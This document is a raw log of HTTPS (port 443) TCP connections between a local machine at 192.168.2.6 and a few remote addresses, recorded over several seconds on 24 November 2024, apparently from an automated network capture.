                                                                                                                                                                                              Nov 24, 2024 13:39:51.796413898 CET49839443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.796453953 CET4434983913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.796542883 CET49839443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.796772003 CET49839443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.796783924 CET4434983913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.820301056 CET4434983113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.820466042 CET4434983113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.820535898 CET49831443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.820630074 CET49831443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.820630074 CET49831443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.820667982 CET4434983113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.820696115 CET4434983113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.823343992 CET49840443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.823381901 CET4434984013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.823493004 CET49840443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.823658943 CET49840443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.823672056 CET4434984013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.918804884 CET4434983013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.921798944 CET4434983013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.921864986 CET49830443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.921960115 CET49830443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.921979904 CET4434983013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.925626993 CET49841443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.925669909 CET4434984113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.925739050 CET49841443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.925911903 CET49841443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.925928116 CET4434984113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:52.061148882 CET4434983313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:52.075524092 CET49833443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:52.075556040 CET4434983313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:52.076179981 CET49833443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:52.076186895 CET4434983313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:52.510066986 CET4434983313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:52.513597965 CET4434983313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:52.513658047 CET49833443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:52.513736010 CET49833443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:52.513755083 CET4434983313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:52.513766050 CET49833443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:52.513772011 CET4434983313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:52.517266989 CET49847443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:52.517297983 CET4434984713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:52.517400026 CET49847443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:52.517553091 CET49847443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:52.517560959 CET4434984713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:53.368508101 CET4434983813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:53.416362047 CET49838443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:53.544074059 CET49838443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:53.544081926 CET4434983813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:53.544656038 CET49838443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:53.544661045 CET4434983813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:53.609704018 CET4434983913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:53.610691071 CET49839443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:53.610707045 CET4434983913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:53.611268044 CET49839443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:53.611274004 CET4434983913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:53.623687983 CET4434984013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:53.624434948 CET49840443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:53.624469995 CET4434984013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:53.625205040 CET49840443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:53.625217915 CET4434984013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:53.860147953 CET4434983813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:53.860246897 CET4434983813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:53.860301018 CET49838443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:53.860615015 CET49838443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:53.860634089 CET4434983813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:53.860646009 CET49838443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:53.860651970 CET4434983813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:53.863954067 CET49851443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:53.863989115 CET4434985113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:53.864093065 CET49851443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:53.864455938 CET49851443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:53.864468098 CET4434985113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:54.059912920 CET4434983913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:54.059992075 CET4434983913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:54.060122013 CET49839443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:54.060295105 CET49839443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:54.060308933 CET4434983913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:54.060333967 CET49839443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:54.060342073 CET4434983913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:54.063440084 CET49852443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:54.063544035 CET4434985213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:54.063724041 CET49852443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:54.063908100 CET49852443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:54.063941956 CET4434985213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:54.074897051 CET4434984013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:54.075074911 CET4434984013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:54.075140953 CET49840443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:54.075202942 CET49840443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:54.075223923 CET4434984013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:54.075238943 CET49840443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:54.075247049 CET4434984013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:54.077620029 CET49853443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:54.077671051 CET4434985313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:54.077743053 CET49853443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:54.077863932 CET49853443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:54.077881098 CET4434985313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:54.349565029 CET4434984713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:54.350208044 CET49847443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:54.350224018 CET4434984713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:54.350737095 CET49847443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:54.350742102 CET4434984713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:54.796710014 CET4434984713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:54.799911976 CET4434984713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:54.800122976 CET49847443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:54.803471088 CET49847443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:54.803492069 CET4434984713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:54.803504944 CET49847443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:54.803509951 CET4434984713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:54.808991909 CET49863443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:54.809045076 CET4434986313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:54.809108019 CET49863443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:54.809531927 CET49863443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:54.809549093 CET4434986313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:55.203953028 CET44349806142.250.181.100192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:55.204020977 CET44349806142.250.181.100192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:55.205876112 CET49806443192.168.2.6142.250.181.100
                                                                                                                                                                                              Nov 24, 2024 13:39:55.452410936 CET49806443192.168.2.6142.250.181.100
                                                                                                                                                                                              Nov 24, 2024 13:39:55.452436924 CET44349806142.250.181.100192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:55.614485025 CET4434985113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:55.633516073 CET49851443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:55.633533001 CET4434985113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:55.634035110 CET49851443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:55.634041071 CET4434985113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:55.783288002 CET4434985213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:55.823246002 CET49852443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:55.846045971 CET49852443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:55.846079111 CET4434985213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:55.847276926 CET49852443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:55.847290039 CET4434985213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:55.861247063 CET4434985313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:55.903116941 CET49853443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:56.048508883 CET4434985113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.051713943 CET4434985113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.051810026 CET49851443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:56.191210985 CET49853443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:56.191255093 CET4434985313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.191756010 CET49853443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:56.191765070 CET4434985313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.221914053 CET4434985213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.225049019 CET4434985213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.225191116 CET49852443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:56.259973049 CET49851443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:56.259990931 CET4434985113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.508394957 CET49852443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:56.508466959 CET4434985213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.508502960 CET49852443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:56.508522034 CET4434985213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.574111938 CET4434985313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.576957941 CET4434985313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.577016115 CET4434985313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.577014923 CET49853443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:56.577058077 CET49853443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:56.596072912 CET4434986313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.613563061 CET49867443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:56.613590956 CET4434986713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.613651991 CET49867443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:56.618788958 CET49853443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:56.618819952 CET4434985313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.618834972 CET49853443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:56.618843079 CET4434985313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.622734070 CET49863443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:56.622756004 CET4434986313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.623766899 CET49863443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:56.623774052 CET4434986313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.628084898 CET49868443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:56.628134966 CET4434986813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.628187895 CET49868443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:56.628411055 CET49868443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:56.628428936 CET4434986813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.628504992 CET49867443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:56.628535032 CET4434986713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.637109041 CET4434984113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.649837017 CET49841443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:56.649854898 CET4434984113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.650477886 CET49841443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:56.650484085 CET4434984113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.886512041 CET49870443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:56.886550903 CET4434987013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.886650085 CET49870443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:56.893327951 CET49870443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:56.893345118 CET4434987013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.980575085 CET49873443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:56.980624914 CET443498734.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:56.980684996 CET49873443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:56.981247902 CET49873443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:56.981267929 CET443498734.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:57.039536953 CET4434986313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:57.043478012 CET4434986313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:57.043545008 CET49863443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:57.043597937 CET49863443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:57.043611050 CET4434986313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:57.043622971 CET49863443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:57.043627024 CET4434986313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:57.046509981 CET49878443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:57.046526909 CET4434987813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:57.046627998 CET49878443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:57.046813011 CET49878443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:57.046827078 CET4434987813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:57.070995092 CET4434984113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:57.074600935 CET4434984113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:57.074672937 CET49841443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:57.074738026 CET49841443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:57.074758053 CET4434984113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:57.074771881 CET49841443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:57.074779034 CET4434984113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:57.077079058 CET49879443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:57.077106953 CET4434987913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:57.077186108 CET49879443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:57.077332020 CET49879443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:57.077346087 CET4434987913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:58.416124105 CET4434986813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:58.417982101 CET49868443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:58.418009996 CET4434986813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:58.418519020 CET49868443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:58.418526888 CET4434986813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:58.472686052 CET4434986713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:58.474395990 CET49867443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:58.474411011 CET4434986713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:58.474956036 CET49867443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:58.474961996 CET4434986713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:58.678013086 CET4434987013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:58.678563118 CET49870443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:58.678581953 CET4434987013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:58.679039001 CET49870443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:58.679044008 CET4434987013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:58.730994940 CET443498734.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:58.731138945 CET49873443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:58.732897997 CET49873443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:58.732908964 CET443498734.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:58.733138084 CET443498734.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:58.753442049 CET49873443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:58.793582916 CET4434987913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:58.799328089 CET443498734.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:58.801099062 CET49879443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:58.801125050 CET4434987913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:58.818391085 CET49879443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:58.818397999 CET4434987913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:58.827697039 CET4434987813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:58.858694077 CET4434986813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:58.862286091 CET4434986813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:58.862355947 CET49868443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:58.878473043 CET49878443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:58.878511906 CET4434987813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:58.893438101 CET49878443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:58.893446922 CET4434987813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:58.928740025 CET4434986713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:58.928786039 CET4434986713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:58.928841114 CET4434986713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:58.928883076 CET49867443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:58.928883076 CET49867443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.054349899 CET49868443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.054378033 CET4434986813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.054403067 CET49868443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.054414988 CET4434986813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.055273056 CET49867443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.055319071 CET4434986713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.055331945 CET49867443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.055336952 CET4434986713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.070486069 CET49882443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.070565939 CET4434988213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.070658922 CET49882443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.072078943 CET49883443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.072120905 CET4434988313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.072185040 CET49883443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.073460102 CET49882443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.073488951 CET4434988213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.073605061 CET49883443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.073621035 CET4434988313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.127635956 CET4434987013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.130744934 CET4434987013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.130821943 CET49870443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.130939960 CET49870443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.130964041 CET4434987013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.130978107 CET49870443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.130983114 CET4434987013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.134398937 CET49884443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.134445906 CET4434988413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.134501934 CET49884443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.134818077 CET49884443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.134834051 CET4434988413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.228992939 CET4434987913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.232151985 CET4434987913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.232208014 CET4434987913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.232206106 CET49879443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.232251883 CET49879443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.233122110 CET49879443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.233139992 CET4434987913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.233154058 CET49879443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.233158112 CET4434987913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:59.238053083 CET49887443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:59.238087893 CET4434988713.107.246.63192.168.2.6
